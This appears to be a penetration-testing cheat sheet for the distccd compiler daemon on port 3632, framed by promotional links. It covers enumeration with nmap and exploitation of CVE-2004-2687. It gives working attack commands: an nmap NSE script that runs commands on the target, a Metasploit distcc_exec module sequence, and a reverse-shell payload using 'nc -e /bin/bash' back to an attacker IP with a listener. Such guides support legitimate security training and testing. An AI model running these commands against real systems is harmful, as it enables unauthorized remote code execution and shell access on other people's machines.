# Distcc - Port 3632

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/product-category/membership/)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

### **Basic info**

**Distcc** (Distributed Compiler) is a tool designed to speed up code compilation by distributing the workload to multiple machines over a network.

If a system is running the `distccd` daemon and is misconfigured (especially without authentication), it may allow an attacker to execute arbitrary commands remotely — a vulnerability famously tracked as **CVE-2004-2687**.

***

### **Key Details**

* **Default Port:** `3632/tcp`
* **Service Name:** `distccd`
* **Purpose:** Distribute compilation tasks across multiple computers.
* **Risk:** Remote Code Execution (RCE) if misconfigured.

***

### **Enumeration**

#### **1. Port Discovery**

First, check if the service is open:

```bash
nmap -p 3632 <target>

PORT     STATE SERVICE
3632/tcp open  distccd
```

***

#### **2. Service Fingerprinting**

Confirm it’s actually Distcc:

```bash
nmap -sV -p 3632 <target>
```

***

#### **3. Nmap CVE Check**

Nmap has a script for CVE-2004-2687:

```bash
nmap -p 3632 <target> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```

If the host is vulnerable, you should see the output of the `id` command in the scan results.

***

### **Exploitation**

#### **1. Metasploit**

Metasploit provides a dedicated module:

```bash
msfconsole
use exploit/unix/misc/distcc_exec
set RHOSTS <target>
set RPORT 3632
set CMD id
run
```

You can replace `id` with any command to execute remotely.

***

#### **2. Manual Exploitation (Without Metasploit)**

Distcc can execute shell commands by sending specially crafted requests. A quick PoC can be found here:\
🔗 [DarkCoderSc Gist](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)

***

#### **Example: Reverse Shell Payload**

```bash
nmap -p 3632 <target> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='nc -e /bin/bash <your_ip> <your_port>'"
```

On your attacking machine:

```bash
nc -lvnp <your_port>
```

***

{% hint style="success" %}
Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com)

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/product-category/membership/)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚

</details>
{% endhint %}